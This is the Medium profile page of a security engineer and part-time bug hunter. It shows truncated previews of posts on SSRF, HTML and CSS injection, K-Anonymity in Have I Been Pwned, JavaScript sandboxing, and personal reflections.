Sign in

d0nut

A Star is Born

As we collectively (and emphatically) usher in 2021, I can’t help but look back on 2020 in an effort to try and make sense of it all.

A young, naive d0nut unaware of the bullshit that’s about to come

2020, for me, was the year I was going to become the best version of myself. Just a few months prior to the start of our plague-ridden roller-coaster ride, I began a new position as a Senior Security Engineer on Cruise’s Red Team. I was beyond excited to get an opportunity to branch out from my previously held AppSec role at…


A really fancy paint by numbers.. err, maybe it was a safari for finding different kinds of numbers?

In continuation of the philosophical and foundational nature of the book thus far, Chapter 3 opens with a discussion on kinds of numbers, our reliance on the appearance of some of them in nature and how that fueled their original derivation, and how we can rederive them without ties to our subjective, messy world experience.

The chapter begins with a demonstration of a powerful proof of contradiction demonstrating the existence of irrational numbers. Firstly, the proof (and original inspiration: Pythagorean Theorem) relies on whole numbers and rational numbers existing (rational numbers being ratios of whole numbers). …


This week wasn’t about me.

I and millions of others were focused on the murder of George Floyd.

Black Lives Matter.

My progress will resume in the next update.


I love watching educational Youtube channels. It’s a great way to constantly keep myself exposed to science and technology. And this is nothing new: I’ve always been engrossed with STEM. Even at a young age, I was sure that I would become a scientist or an engineer, destined to discover and build marvelous things. I wanted to understand the distant stars, peer into a black hole, and prove that Einstein-Rosen bridges could be traversed.. one day. Around highschool, my dreams of becoming an Astrophysicist were pushed aside by a (more practical) desire to become an engineer at a major tech…


Title respectfully inspired by Alyssa Herrera’s Piercing the Veil SSRF blog post

It’s been over a year and a half since I’ve started my bug bounty journey as a hacker. With years of experience triaging reports and working in security, I’ve seen a plethora of bug types, attack vectors, and exploitation techniques. I’ve had such a healthy diversity in exposure to these different concepts that it’s quite honestly surprising that one particular bug class has captured my imagination so effortlessly and decisively as Server-Side Request Forgery has.

Today, I want to share my love for SSRF by discussing what it is, why companies care about it, how I approach testing features I…


Three weeks ago I saw a blog post by fellow bug hunter, Jack Cable. The post both inspired and challenged me. The attack vector presented was focused more on reduction in computational security than a binary outcome (e.g. XSS, which either fires or it doesn’t).

Jack’s article presents a theoretical attack by a malicious (or compromised) application using K-Anonymity, similar to that used by Have I Been Pwned (HIBP).

Today, we’ll briefly talk about what K-Anonymity is and why the implementation of K-Anonymity in HIBP matters. …


I used Google Drawings and there’s no shame in that

This is a story about how I (re)discovered an exploitation technique and took a bug with fairly limited impact to a 5 digit bounty by bypassing existing mitigations.

A Curious Case of HTML Injection

André Baptista and Cache-Money were working on a very strange bug. It started off as a simple character-set bypass and through a crazy series of steps evolved into HTML injection somewhere else in the target (not full-blown XSS, though, due to DomPurify). It was a cool chain and they could tell they were onto something big, but the next step was giving them a fair bit of trouble.

After hearing about the…


This is the only good CC0 image I could find

If you’re not aware, I joined Dropbox’s security team last September. Since then, I’ve become very involved in the bug bounty community on two fronts: both running a program and as a hacker in my spare time. It’s offered me a unique perspective on many divisive issues and I’ve used my experiences to both improve our program as well as helping to bring a program’s perspective into the conversation with other prominent bug hunters.

Sometime last week I gave back to the bug bounty community by contributing a tip to #bugbountytip on twitter.

Originally, I didn’t expect anyone to…


Today’s topic is something that’s already pretty well covered: CSS injections. I wanted to talk about my experience implementing this attack on a real site. As you may have encountered, the situation in which you find a vulnerability may not be the pristine situation many vulnerabilities are originally described in (like XSS but with a WAF). As such, writing about the experiences researchers encounter in real life can give light to practical implementations of preventative mechanisms (or general roadblocks) and bypasses for those blockers.

As some of you may know, I’ve recently taken up bug bounties in my spare time…


Where I want my code to run

Hey all!

I was terribly excited to see all of my new followers on Medium and wanted to ensure I started giving a (near) constant supply of new reading material for everyone. As such, I decided to write this quick article based on a topic of discussion that came up during my trip to Amsterdam (which I’ll write about soon enough :P ).

Why Sandbox Javascript (with Javascript)?

Honestly there probably isn’t a good reason. Unless you’re actively exploiting either a CTF challenge or an electron app that implemented the security guidelines to a ‘T’, you probably won’t find yourself in a case where you…

d0nut

Security Engineer, developer, and part-time bug hunter

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store